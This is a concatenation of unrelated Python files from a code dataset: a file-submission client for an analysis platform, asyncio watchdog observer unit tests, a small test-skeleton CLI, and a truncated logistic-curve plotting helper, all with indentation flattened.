ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
if fileinfo['size'] > max_size and not ignore_size:
msg = "File too large (%d > %d). Submission failed" % (fileinfo['size'], max_size)
raise SubmissionException(msg)
# We'll just merge the mandatory arguments, fileinfo, and any
# optional kw and pass those all on to the dispatch callback.
task_args = fileinfo
task_args['priority'] = 0 # Just a default.
task_args.update(kw)
task_args['srl'] = sha256
task_args['original_filename'] = name
task_args['sid'] = sid
task_args['path'] = name
if 'metadata' in task_args:
task_args['metadata'].update(al_meta)
else:
task_args['metadata'] = al_meta
dispatch_request = Task.create(**task_args)
submissions.append(dispatch_request)
finally:
if temporary_path:
try:
os.unlink(temporary_path)
except: # pylint: disable=W0702
pass
storage.create_submission(
dispatch_request.sid,
dispatch_request.as_submission_record(),
files)
dispatch_queue = forge.get_dispatch_queue()
for submission in submissions:
dispatch_queue.submit(submission)
log.debug("Submission complete. Dispatched: %s", dispatch_request)
return submissions[0].raw.copy()
@classmethod
def watch(cls, sid, watch_queue):
t = Task.watch(**{
'priority': config.submissions.max.priority,
'sid': sid,
'watch_queue': watch_queue,
})
n = forge.determine_dispatcher(sid)
forge.get_control_queue('control-queue-' + str(n)).push(t.raw)
@classmethod
def result_dict(cls, transport, sha256, exists, upload_path, kw):
return {
'exists': exists,
'upload_path': upload_path,
'filestore': str(transport),
'sha256': sha256,
'kwargs': kw,
}
class SubmissionService(object):
def __init__(self):
self.storage = forge.get_datastore()
self.transport = forge.get_filestore()
log.info("Submission service instantiated. Transport::{0}".format(
self.transport))
def check_exists(self, sha256_list):
return SubmissionWrapper.check_exists(self.transport, sha256_list)
def identify(self, sha256, **kw):
return SubmissionWrapper.identify(self.transport, self.storage, sha256, **kw)
def presubmit(self, sha256, **kw):
return SubmissionWrapper.presubmit(self.transport, sha256, **kw)
def submit(self, sha256, path, priority, submitter, **kw):
return SubmissionWrapper.submit(self.transport, self.storage, sha256, path, priority, submitter, **kw)
def submit_inline(self, file_paths, **kw):
return SubmissionWrapper.submit_inline(self.storage, self.transport, file_paths, **kw)
def submit_multi(self, files, **kw):
return SubmissionWrapper.submit_multi(self.storage, self.transport, files, **kw)
@classmethod
def watch(cls, sid, watch_queue):
return SubmissionWrapper.watch(sid, watch_queue)
def result_dict(self, sha256, exists, upload_path, kw):
# noinspection PyProtectedMember
return SubmissionWrapper.result_dict(self.transport, sha256, exists, upload_path, kw)
class SubmissionClient(object):
def __init__(self, server_url=None, datastore=None):
if not server_url:
server_url = config.submissions.url
self.server_url = server_url
self.transport = forge.get_filestore()
self.datastore = datastore
self.is_unix = os.name == "posix"
if not self.is_unix:
from assemblyline_client import Client
self.client = Client(self.server_url, auth=SUBMISSION_AUTH)
elif self.datastore is None:
self.datastore = forge.get_datastore()
def check_srls(self, srl_list):
if self.is_unix:
return self._check_srls_unix(srl_list)
else:
return self._check_srls_windows(srl_list)
def _check_srls_unix(self, srl_list):
if not srl_list:
return True
result = SubmissionWrapper.check_exists(self.transport, srl_list)
return len(result.get('existing', [])) == len(srl_list)
def _check_srls_windows(self, srl_list):
if not srl_list:
return True
result = self.client.submit.checkexists(*srl_list)
return len(result.get('existing', [])) == len(srl_list)
def identify_supplementary(self, rd, **kw):
# Pass along all parameters as query arguments.
submits = {k: dict(kw.items() + v.items()) for k, v in rd.iteritems()}
if self.is_unix:
return self._identify_supplementary_unix(submits)
else:
return self._identify_supplementary_windows(submits)
def _identify_supplementary_unix(self, submits):
submit_results = {}
for key, submit in submits.iteritems():
file_info = SubmissionWrapper.identify(self.transport, self.datastore, **submit)
if file_info:
submit_result = {"status": "succeeded", "fileinfo": file_info}
else:
submit_result = {"status": "failed", "fileinfo": {}}
submit_results[key] = submit_result
return submit_results
def _identify_supplementary_windows(self, submits):
return self.client.submit.identify(submits)
def presubmit_local_files(self, file_paths, **kw):
default_error = {'succeeded': False, 'error': 'Unknown Error'}
presubmit_requests = {}
presubmit_results = {}
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
# Prepare the batch presubmit.
rid_map = {}
for rid, local_path in enumerate(file_paths):
rid = str(rid)
rid_map[rid] = local_path
try:
assert_valid_file(local_path)
d = digests.get_digests_for_file(local_path,
calculate_entropy=False)
if d['size'] > max_size and not ignore_size:
presubmit_results[rid] = {
'succeeded': False,
'error': 'file too large (%d > %d). Skipping' % (d['size'], max_size),
}
continue
presubmit_requests[rid] = d
# Set a default error. Overwritten on success.
presubmit_results[rid] = default_error.copy()
except Exception as ex: # pylint: disable=W0703
log.error("Exception processing local file: %s. Skipping", ex)
presubmit_results[rid] = {
'succeeded': False,
'error': 'local failure before presubmit: {0}'.format(ex),
}
continue
if self.is_unix:
presubmit_results = self._presubmit_local_files_unix(presubmit_requests, presubmit_results)
else:
presubmit_results = self._presubmit_local_files_windows(presubmit_requests, presubmit_results)
if len(presubmit_results) != len(file_paths):
log.error('Problem submitting %s: %s',
pprint.pformat(file_paths),
pprint.pformat(presubmit_results))
# noinspection PyUnresolvedReferences
for rid, result in presubmit_results.iteritems():
result['path'] = rid_map[rid]
return presubmit_results
def _presubmit_local_files_unix(self, presubmit_requests, presubmit_results):
for key, presubmit in presubmit_requests.iteritems():
succeeded = True
presubmit_result = {}
try:
presubmit_result = SubmissionWrapper.presubmit(self.transport, **presubmit)
except Exception as e: # pylint: disable=W0703
succeeded = False
msg = 'Failed to presubmit for {0}:{1}'.format(key, e)
presubmit_result['error'] = msg
presubmit_result['succeeded'] = succeeded
presubmit_results[key] = presubmit_result
return presubmit_results
def _presubmit_local_files_windows(self, presubmit_requests, presubmit_results):
presubmit_results.update(self.client.submit.presubmit(presubmit_requests))
return presubmit_results
def submit_existing_file(self, path, **kw):
request = {
0: {
'path': safe_str(path),
'sha256': kw['sha256'],
}
}
return self.submit_requests(request, **kw)
def submit_local_files(self, file_requests, **kw):
results = {}
file_paths = [
file_requests[k]['path'] for k in sorted(file_requests.keys(), key=int)
]
successful, errors = \
self.transfer_local_files(file_paths, location='near', **kw)
for k in successful.keys():
req = file_requests.get(k, {})
display_name = req.pop('display_name')
req['path'] = display_name
ret = successful[k]
ret.update(req)
# This prevents a badly written service to resubmit the file originally submitted
if successful[k].get('sha256', None) == kw.get('psrl', None):
path = successful[k]['path']
errors[k] = {
'succeeded': False,
'path': path,
'error': "File submission was aborted for file '%s' because it the same as its parent." % path
}
log.warning("Service is trying to submit the parent file as an extracted file.")
del successful[k]
elif req.get('submission_tag') is not None:
# Save off any submission tags
st_name = "st/%s/%s" % (kw.get('psrl', None), successful[k].get('sha256', None))
eh = ExpiringHash(st_name, ttl=7200)
for st_name, st_val in req['submission_tag'].iteritems():
eh.add(st_name, st_val)
# Send the submit requests.
if successful:
results = self.submit_requests(successful, **kw)
else:
log.warn('Nothing to submit after presubmission processing.')
results.update(errors)
return results
def submit_requests(self, rd, **kw):
# Pass along all parameters as query arguments.
submits = {k: dict(kw.items() + v.items()) for k, v in rd.iteritems()}
if self.is_unix:
return self._submit_requests_unix(submits)
else:
return self._submit_requests_windows(submits)
def _submit_requests_unix(self, submits):
submit_results = {}
for key, submit in submits.iteritems():
path = submit.get('path', './path/missing')
if 'description' not in submit:
submit['description'] = "Inspection of file: %s" % path
submit_result = SubmissionWrapper.submit(self.transport, self.datastore, **submit)
submit_results[key] = submit_result
return submit_results
def _submit_requests_windows(self, submits):
return self.client.submit.start(submits)
def submit_supplementary_files(self, file_requests, location='far', **kw):
results = {}
file_paths = [
file_requests[k]['path'] for k in sorted(file_requests.keys(), key=int)
]
successful, errors = \
self.transfer_local_files(file_paths, location=location, **kw)
for k in successful.keys():
req = file_requests.get(k, {})
ret = successful[k]
ret.update(req)
# This prevents a badly written service to resubmit the file originally submitted
if successful[k].get('sha256', None) == kw.get('psrl', None):
path = successful[k]['path']
errors[k] = {
'succeeded': False,
'path': path,
'error': "File submission was aborted for file '%s' because it the same as its parent." % path
}
log.warning("Service is trying to submit the parent file as a supplementary file.")
del successful[k]
# Send the submit requests.
if successful:
results = self.identify_supplementary(successful, **kw)
else:
log.warn('Nothing to submit after presubmission processing.')
results.update(errors)
return results
def transfer_local_files(self, file_paths, location='all', **kw):
errors = {}
successful = {}
transfer_requests = self.presubmit_local_files(file_paths, **kw)
delete = []
# noinspection PyUnresolvedReferences
for rid, result in transfer_requests.iteritems():
key = result['path']
if key not in file_paths:
log.error("Unexpected presubmit result for %s.", key)
delete.append(key)
continue
if not result['succeeded']:
log.warn('skipping failed presubmit for %s - %s', key, result)
errors[rid] = {
'succeeded': False,
'path': safe_str(key),
'error': 'Presubmit failed: {0}'.format(result.get('error', 'Unknown Error')),
}
continue
for rid in delete:
# noinspection PyUnresolvedReferences
del transfer_requests[rid]
# Process presubmit results. Start building the submit requests. Keep
# note of all files we need to transfer to server.
files_to_transfer = []
# noinspection PyUnresolvedReferences
for rid, result in transfer_requests.iteritems():
key = result['path']
# If the file doesn't exist in filestore, let the client know they
# need to submit
if not result.get('succeeded', True):
continue
elif not result.get('exists'):
upload_path = result.get('upload_path')
log.debug('File not on server. Should copy %s -> %s using %s',
key, upload_path, str(self.transport))
files_to_transfer.append((key, upload_path))
else:
log.debug('File is already on server.')
# First apply the defaults
successful[rid] = {'path': safe_str(key), 'sha256': result['sha256']}
# Transfer any files which the server has indicated it doesn't have.
if files_to_transfer:
start = time.time()
log.debug("Transfering files %s", str(files_to_transfer))
failed_transfers = \
self.transport.put_batch(files_to_transfer, location=location)
if failed_transfers:
log.error("The following files failed to transfer: %s",
failed_transfers)
end = time.time()
log.debug("Transfered %s in %s.", len(files_to_transfer),
(end - start))
else:
log.debug("NO FILES TO TRANSFER.")
return successful, errors
| StarcoderdataPython |
1961426 | <reponame>BoniLindsley/phile
#!/usr/bin/env python3
# Standard library.
import asyncio
import collections.abc
import functools
import pathlib
import queue
import typing
import unittest
import unittest.mock
# External dependencies.
import watchdog.events
import watchdog.observers
# Internal packages.
import phile.asyncio
import phile.asyncio.pubsub
import phile.unittest
import phile.watchdog.asyncio
import phile.watchdog.observers
_T = typing.TypeVar('_T')
class StartFailed(Exception):
pass
class TestEventView(unittest.IsolatedAsyncioTestCase):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.called: asyncio.Event
self.event_view: phile.watchdog.asyncio.EventView
self.next_node: (
phile.asyncio.pubsub.Node[watchdog.events.FileSystemEvent]
)
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.called = called = asyncio.Event()
self.next_node = (
phile.asyncio.pubsub.Node[watchdog.events.FileSystemEvent]()
)
self.event_view = phile.watchdog.asyncio.EventView(
next_node=self.next_node
)
async def aclose() -> None:
called.set()
self.event_view.aclose_callback = aclose
async def test_aclose__calls_given_callable(self) -> None:
self.assertFalse(self.called.is_set())
await phile.asyncio.wait_for(self.event_view.aclose())
self.assertTrue(self.called.is_set())
async def test_aclose__is_idempotent(self) -> None:
self.assertFalse(self.called.is_set())
await phile.asyncio.wait_for(self.event_view.aclose())
self.assertTrue(self.called.is_set())
self.called.clear()
await phile.asyncio.wait_for(self.event_view.aclose())
self.assertFalse(self.called.is_set())
async def test_aexit___calls_aclose(self) -> None:
async with self.event_view:
pass
self.assertTrue(self.called.is_set())
class TestEventQueue(unittest.IsolatedAsyncioTestCase):
async def test_put__puts_event(self) -> None:
event_queue = phile.watchdog.asyncio.EventQueue()
view = event_queue.__aiter__()
expected_event = watchdog.events.FileCreatedEvent('')
event_queue.put(
event_data=(
expected_event,
watchdog.observers.api.ObservedWatch('', False)
)
)
event = await phile.asyncio.wait_for(view.__anext__())
self.assertEqual(event, expected_event)
class EventEmitterMock:
def __init__( # pylint: disable=keyword-arg-before-vararg
self,
event_queue: watchdog.observers.api.EventQueue,
watch: watchdog.observers.api.ObservedWatch,
timeout: float = 1,
*args: typing.Any,
source_events: collections.abc.Iterable[
watchdog.events.FileSystemEvent] = [],
**kwargs: typing.Any
) -> None:
# TODO[mypy issue 4001]: Remove type ignore.
super().__init__(*args, **kwargs) # type: ignore[call-arg]
self._event_queue = event_queue
self._loop = asyncio.get_running_loop()
self._source_events = (
queue.SimpleQueue[watchdog.events.FileSystemEvent]()
)
self._started = False
self._stopped = False
self._stopped_event = asyncio.Event()
self.watch = watch
self.timeout = timeout
if source_events is not None:
for event in source_events:
self._source_events.put_nowait(event)
@classmethod
def create_emitter_class(
cls,
source_events: collections.abc.Iterable[
watchdog.events.FileSystemEvent],
) -> collections.abc.Callable[[
watchdog.observers.api.EventQueue,
watchdog.observers.api.ObservedWatch,
float,
], phile.watchdog.asyncio.EventEmitter]:
return functools.partial( # type: ignore[return-value]
cls, source_events=source_events
)
def queue_event(
self, event: watchdog.events.FileSystemEvent
) -> None:
if self._stopped:
raise RuntimeError
if self._started:
self._event_queue.put((event, self.watch))
else:
self._source_events.put_nowait(event)
def start(self) -> None:
self._started = True
try:
while True:
self.queue_event(self._source_events.get_nowait())
except queue.Empty:
pass
def stop(self) -> None:
self._stopped = True
self._loop.call_soon_threadsafe(self._stopped_event.set)
def is_alive(self) -> bool:
return self._started and not self._stopped
async def async_join(self) -> None:
await self._stopped_event.wait()
class TestEventEmitterMock(
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.emitter: EventEmitterMock
self.event_queue: watchdog.observers.api.EventQueue
self.expected_event: watchdog.events.FileSystemEvent
self.watch: watchdog.observers.api.ObservedWatch
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.event_queue = watchdog.observers.api.EventQueue()
self.watch = watchdog.observers.api.ObservedWatch(
str(self.temporary_directory), False
)
self.emitter = EventEmitterMock(self.event_queue, self.watch)
self.expected_event = watchdog.events.FileCreatedEvent(
str(self.temporary_directory)
)
async def test_is_alive__is_false_by_default(self) -> None:
self.assertFalse(self.emitter.is_alive())
async def test_start__makes_is_alive(self) -> None:
self.emitter.start()
self.assertTrue(self.emitter.is_alive())
async def test_stop__makes_not_is_alive(self) -> None:
self.emitter.start()
self.emitter.stop()
self.assertFalse(self.emitter.is_alive())
async def test_async_join__after_stop(self) -> None:
self.emitter.start()
self.emitter.stop()
await phile.asyncio.wait_for(self.emitter.async_join())
async def test_queue_event__puts_events_into_queue(self) -> None:
self.emitter.start()
self.emitter.queue_event(self.expected_event)
received_event = self.event_queue.get_nowait()
self.assertEqual(
received_event, (self.expected_event, self.watch)
)
async def test_queue_event__does_not__queue_if_not_started(
self
) -> None:
self.emitter.queue_event(self.expected_event)
self.assertTrue(self.event_queue.empty())
async def test_queue_event__raises_if_stopped(self) -> None:
self.emitter.start()
self.emitter.stop()
with self.assertRaises(RuntimeError):
self.emitter.queue_event(self.expected_event)
async def test_start__queue_events_if_any(self) -> None:
self.emitter.queue_event(self.expected_event)
self.emitter.start()
received_event = self.event_queue.get_nowait()
self.assertEqual(
received_event, (self.expected_event, self.watch)
)
async def test_create_emitter_class__pre_queue_events(self) -> None:
# It acts as a class.
Emitter = ( # pylint: disable=invalid-name
EventEmitterMock.create_emitter_class(
source_events=(self.expected_event, )
)
)
emitter = Emitter(self.event_queue, self.watch, 1)
self.assertTrue(self.event_queue.empty())
emitter.start()
received_event = self.event_queue.get_nowait()
self.assertEqual(
received_event, (self.expected_event, self.watch)
)
class TestBaseObserver(
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.event_emitter_class_mock: unittest.mock.Mock
self.observer: phile.watchdog.asyncio.BaseObserver
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
emitter_patcher = unittest.mock.patch(
'phile.watchdog.asyncio.EventEmitter',
autospec=True,
)
self.event_emitter_class_mock = emitter_patcher.start()
self.addCleanup(emitter_patcher.stop)
self.observer = phile.watchdog.asyncio.BaseObserver(
emitter_class=self.event_emitter_class_mock,
)
def test_has_expected_attributes(self) -> None:
self.assertEqual(
self.observer.timeout,
watchdog.observers.api.DEFAULT_OBSERVER_TIMEOUT
)
async def test_schedule_starts_and_unschedule_stops_emitter(
self
) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
emitter_mock.is_alive.return_value = False
await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
try:
emitter_mock.start.assert_called_once()
emitter_mock.is_alive.return_value = True
finally:
await phile.asyncio.wait_for(
self.observer.unschedule(self.temporary_directory)
)
emitter_mock.stop.assert_called_once()
async def test_schedule_returns_queue_and_unschedule_stops_it(
self
) -> None:
event_view = await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
try:
self.assertIsInstance(
event_view, phile.watchdog.asyncio.EventView
)
finally:
await phile.asyncio.wait_for(
self.observer.unschedule(self.temporary_directory),
)
with self.assertRaises(StopAsyncIteration):
await phile.asyncio.wait_for(event_view.__anext__())
async def test_schedule__returns_cm_that_starts_and_stops_emitter(
self
) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
):
emitter_mock.start.assert_called_once()
emitter_mock.stop.assert_called_once()
async def test_schedule__returns_view_ending_on_exit(self) -> None:
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as event_view:
self.assertIsInstance(
event_view, phile.watchdog.asyncio.EventView
)
with self.assertRaises(StopAsyncIteration):
await phile.asyncio.wait_for(event_view.__anext__())
async def test_schedule_not_stopping_if_start_fails(self) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
emitter_mock.is_alive.return_value = False
emitter_mock.start.side_effect = StartFailed
with self.assertRaises(StartFailed):
await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
emitter_mock.stop.assert_not_called()
async def test_schedule_not_stopping_queue_if_start_fails(
self
) -> None:
# Cannot really ensure it is not called.
# Test for coverage.
queue_patcher = unittest.mock.patch(
'phile.watchdog.asyncio.EventQueue',
autospec=True,
)
event_queue_class_mock = queue_patcher.start()
self.addCleanup(queue_patcher.stop)
event_queue_class_mock.side_effect = StartFailed
# The mocking has to be done before the observer is created
# because the mocked class is used in the constructor.
self.observer = phile.watchdog.asyncio.BaseObserver(
emitter_class=self.event_emitter_class_mock,
)
emitter_mock = self.event_emitter_class_mock.return_value
emitter_mock.is_alive.return_value = False
with self.assertRaises(StartFailed):
await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
)
emitter_mock.stop.assert_not_called()
event_queue_class_mock.return_value.put_done.assert_not_called()
async def test_schedule_can_be_stacked(self) -> None:
emitter_mock = self.event_emitter_class_mock.return_value
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as event_view:
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as another_view:
self.assertIs(
# pylint: disable=protected-access
another_view._next_node,
event_view._next_node,
)
emitter_mock.stop.assert_not_called()
emitter_mock.stop.assert_called_once()
class TestObserver(
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.observer: phile.watchdog.asyncio.Observer
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.observer = phile.watchdog.asyncio.Observer()
async def test_is_base_observer(self) -> None:
self.assertIsInstance(
self.observer,
phile.watchdog.asyncio.BaseObserver,
)
async def test_detects_create_event(self) -> None:
async with await phile.asyncio.wait_for(
self.observer.schedule(self.temporary_directory)
) as event_view:
file_path = self.temporary_directory / 'touched.txt'
file_path.touch()
event = await phile.asyncio.wait_for(event_view.__anext__())
self.assertEqual(
event,
watchdog.events.FileCreatedEvent(str(file_path)),
)
class UsesObserver(unittest.IsolatedAsyncioTestCase):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
self.observer: phile.watchdog.asyncio.BaseObserver
super().__init__(*args, **kwargs)
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.observer = phile.watchdog.asyncio.Observer()
async def assert_watchdog_emits(
self,
source_view: (
phile.asyncio.pubsub.View[watchdog.events.FileSystemEvent]
),
expected_event: watchdog.events.FileSystemEvent,
) -> None:
received_events: list[watchdog.events.FileSystemEvent] = []
async def run() -> None:
async for event in source_view:
if event == expected_event:
return
received_events.append(event)
try:
await phile.asyncio.wait_for(run())
except BaseException as error:
message = (
'{expected_event} not found.\n'
'Received: {received_events}'.format(
expected_event=expected_event,
received_events=received_events,
)
)
raise self.failureException(message) from error
async def schedule_watchdog_observer(
self, path: pathlib.Path
) -> phile.watchdog.asyncio.EventView:
event_view = await phile.asyncio.wait_for(
self.observer.schedule(path)
)
self.addAsyncCleanup(event_view.aclose)
return event_view
class TestSplitFileMoveEvent(
phile.unittest.UsesTemporaryDirectory, unittest.TestCase
):
def test_ignores_directory_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.DirCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.split_file_move_event(source_event),
tuple(),
)
def test_returns_src_path_of_non_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.FileCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.split_file_move_event(source_event),
(source_event, ),
)
def test_returns_src_and_dest_paths_of_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
target_path = (self.temporary_directory / 'something.file_2')
source_event = watchdog.events.FileMovedEvent(
str(event_path), str(target_path)
)
self.assertEqual(
phile.watchdog.asyncio.split_file_move_event(source_event),
(
watchdog.events.FileDeletedEvent(str(event_path)),
watchdog.events.FileCreatedEvent(str(target_path)),
),
)
class TestEventToFilePaths(
phile.unittest.UsesTemporaryDirectory, unittest.TestCase
):
def test_ignores_directory_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.DirCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.event_to_file_paths(source_event),
tuple(),
)
def test_returns_src_path_of_non_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
source_event = watchdog.events.FileCreatedEvent(str(event_path))
self.assertEqual(
phile.watchdog.asyncio.event_to_file_paths(source_event),
(event_path, ),
)
def test_returns_src_and_dest_paths_of_move_file_event(self) -> None:
event_path = (self.temporary_directory / 'something.file')
target_path = (self.temporary_directory / 'something.file_2')
source_event = watchdog.events.FileMovedEvent(
str(event_path), str(target_path)
)
self.assertEqual(
phile.watchdog.asyncio.event_to_file_paths(source_event),
(event_path, target_path),
)
class TestFilterPath(
phile.unittest.UsesTemporaryDirectory, unittest.TestCase
):
def test_returns_true_if_passes_filter(self) -> None:
event_path = (self.temporary_directory / 'something.file')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory,
expected_suffix='.file'
)
self.assertTrue(passes_filter)
def test_returns_false_if_parent_directory_unexpected(self) -> None:
event_path = (self.temporary_directory / 'something.file')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory / 's',
expected_suffix='.file'
)
self.assertFalse(passes_filter)
def test_returns_false_if_suffix_unexpected(self) -> None:
event_path = (self.temporary_directory / 'something.file_wrong')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory,
expected_suffix='.file'
)
self.assertFalse(passes_filter)
def test_returns_true_if_expected_suffix_is_blank(self) -> None:
event_path = (self.temporary_directory / 'something.file_wrong')
passes_filter = phile.watchdog.asyncio.filter_path(
event_path,
expected_parent=self.temporary_directory,
expected_suffix=''
)
self.assertTrue(passes_filter)
async def to_async_iter(
source: collections.abc.Iterable[_T]
) -> collections.abc.AsyncIterable[_T]:
for item in source:
yield item
class TestMonitorFileExistence(
UsesObserver,
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.expected_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
)
self.loader: collections.abc.AsyncIterator[tuple[
pathlib.Path, typing.Optional[str]]]
self.watchdog_view: collections.abc.AsyncIterator[
watchdog.events.FileSystemEvent]
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.expected_files = []
self.watchdog_view = await self.schedule_watchdog_observer(
self.temporary_directory
)
self.loader = phile.watchdog.asyncio.load_changed_files(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=self.watchdog_view,
)
async def assert_returns(self, ) -> None:
received_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
) = []
try:
load_aiter = self.loader.__aiter__()
for expected_file in self.expected_files:
found = False
while not found:
received_file = await load_aiter.__anext__()
received_files.append(received_file)
found = (received_file == expected_file)
except BaseException as error:
message = (
'Did not receive\n{expected_files}\n'
'Received\n{received_files}'.format(
expected_files=self.expected_files,
received_files=received_files,
)
)
raise self.failureException(message) from error
async def test_true_for_creation(self) -> None:
src_path = self.temporary_directory / 'a.suf'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileCreatedEvent(str(src_path))
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(existences, [(src_path, True)])
async def test_false_for_deletion(self) -> None:
src_path = self.temporary_directory / 'a.suf'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileDeletedEvent(str(src_path))
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(existences, [(src_path, False)])
async def test_returns_two_items_for_move(self) -> None:
src_path = self.temporary_directory / 'a.suf'
dest_path = self.temporary_directory / 'b.suf'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileMovedEvent(
str(src_path), str(dest_path)
)
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(
existences, [(src_path, False), (dest_path, True)]
)
async def test_ignores_wrong_suffix(self) -> None:
src_path = self.temporary_directory / 'a.suf_wrong'
source_events: list[watchdog.events.FileSystemEvent] = [
watchdog.events.FileCreatedEvent(str(src_path))
]
existences: list[tuple[pathlib.Path, bool]] = [
(path, existence) async for path, existence in
phile.watchdog.asyncio.monitor_file_existence(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=to_async_iter(source_events),
)
]
self.assertEqual(existences, [])
class TestLoadChangedFiles(
UsesObserver,
phile.unittest.UsesTemporaryDirectory,
unittest.IsolatedAsyncioTestCase,
):
def __init__(self, *args: typing.Any, **kwargs: typing.Any) -> None:
super().__init__(*args, **kwargs)
self.expected_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
)
self.loader: collections.abc.AsyncIterator[tuple[
pathlib.Path, typing.Optional[str]]]
self.watchdog_view: collections.abc.AsyncIterator[
watchdog.events.FileSystemEvent]
async def asyncSetUp(self) -> None:
await super().asyncSetUp()
self.expected_files = []
self.watchdog_view = await self.schedule_watchdog_observer(
self.temporary_directory
)
self.loader = phile.watchdog.asyncio.load_changed_files(
directory_path=self.temporary_directory,
expected_suffix='.suf',
watchdog_view=self.watchdog_view,
)
async def assert_returns(self, ) -> None:
received_files: (
list[tuple[pathlib.Path, typing.Optional[str]]]
) = []
try:
load_aiter = self.loader.__aiter__()
for expected_file in self.expected_files:
found = False
while not found:
received_file = await load_aiter.__anext__()
received_files.append(received_file)
found = (received_file == expected_file)
except BaseException as error:
message = (
'Did not receive\n{expected_files}\n'
'Received\n{received_files}'.format(
expected_files=self.expected_files,
received_files=received_files,
)
)
raise self.failureException(message) from error
async def test_loads_readable_file(self) -> None:
self.expected_files.append(
(self.temporary_directory / 'a.suf', 'b')
)
load_task = asyncio.create_task(self.assert_returns())
await asyncio.sleep(0) # Give the task time to start.
self.expected_files[0][0].write_text('b')
await phile.asyncio.wait_for(load_task)
async def test_returns_none_for_deletion(self) -> None:
await self.test_loads_readable_file()
self.expected_files.clear()
self.expected_files.append(
(self.temporary_directory / 'a.suf', None)
)
load_task = asyncio.create_task(self.assert_returns())
await asyncio.sleep(0)
self.expected_files[0][0].unlink()
await phile.asyncio.wait_for(load_task)
async def test_ignores_wrong_suffix(self) -> None:
self.expected_files.append(
(self.temporary_directory / 'a.suf', 'b')
)
load_task = asyncio.create_task(self.assert_returns())
await asyncio.sleep(0)
(self.temporary_directory / 'b.suf_bad').write_text('no')
self.expected_files[0][0].write_text('b')
await phile.asyncio.wait_for(load_task)
| StarcoderdataPython |
3402131 | <reponame>jerry-git/test-skeleton
import argparse
def cli():
parser = argparse.ArgumentParser(description='Test skeleton creator')
parser.add_argument('input', type=str, help='filepath of input .py file')
parser.add_argument(
'--save', action='store_true', help='save result as test_<input> file')
return parser.parse_args()
| StarcoderdataPython |
349834 | import morphs
import numpy as np
import scipy as sp
import matplotlib.pylab as plt
import seaborn as sns
def _cf_4pl(x, A, K, B, M):
return A + (K - A) / (1 + np.exp(-B * (x - M)))
def _4pl(x, y, color=None, **kwargs):
data = kwargs.pop("data")
popt, pcov = sp.optimize.curve_fit(
_cf_4pl, data[x].values, data[y].values, maxfev=10000
)
try:
result_4pl = morphs.logistic.four_param_logistic(popt)
t = np.arange(128) + 1
if color is None:
lines, = plt.plot(x.mean(), y.mean())
color = lines.get_color()
lines.remove()
plt.plot(t, result_4pl(t), color=color)
except TypeError:
